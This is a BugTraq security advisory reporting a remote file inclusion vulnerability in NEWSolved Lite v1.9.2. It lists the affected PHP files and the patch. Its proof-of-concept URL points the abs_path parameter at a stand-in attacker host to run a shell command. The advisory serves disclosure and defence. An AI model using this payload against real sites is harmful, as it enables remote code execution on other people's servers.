BugTraq
NEWSolved Lite v1.9.2 (abs_path) Remote File Inclusion Aug 06 2006 06:14PM
philipp niedziela gmx de
+--------------------------------------------------------------------

+

+ NEWSolved Lite v1.9.2 (abs_path) Remote File Inclusion

+

+--------------------------------------------------------------------

+

+ Affected Software .: NEWSolved Lite v1.9.2 (maybe above)

+ Venedor ...........: http://www.usolved.net

+ Class .............: Remote File Inclusion

+ Risk ..............: high (Remote File Execution)

+ Found by ..........: Philipp Niedziela

+ Original advisory .: http://www.bb-pcsecurity.de/sicherheit_286.htm

+ Contact ...........: webmaster[at]bb-pcsecurity[.]de

+ http://www.bb-pcsecurity.de

+

+--------------------------------------------------------------------

+

+ Affected files:

+

+ newsscript_lyt.php

+ newsticker/newsscript_get.php

+ inc/output/news_theme1.php

+ inc/output/news_theme2.php

+ inc/output/news_theme3.php

+

+--------------------------------------------------------------------

+

+ $abs_path is not properly sanitized before being used

+

+--------------------------------------------------------------------

+

+ Solution:

+

+ Download Patch v1.9.3 and replace the files above.

+

+--------------------------------------------------------------------

+

+ PoC:

+

+ http://[target]/inc/output/news_theme1.php?abs_path=http://evilsite.com?
cmd=ls

+

+-------------------------[ E O F ]----------------------------------

[ reply ]


 

Privacy Statement
Copyright 2010, SecurityFocus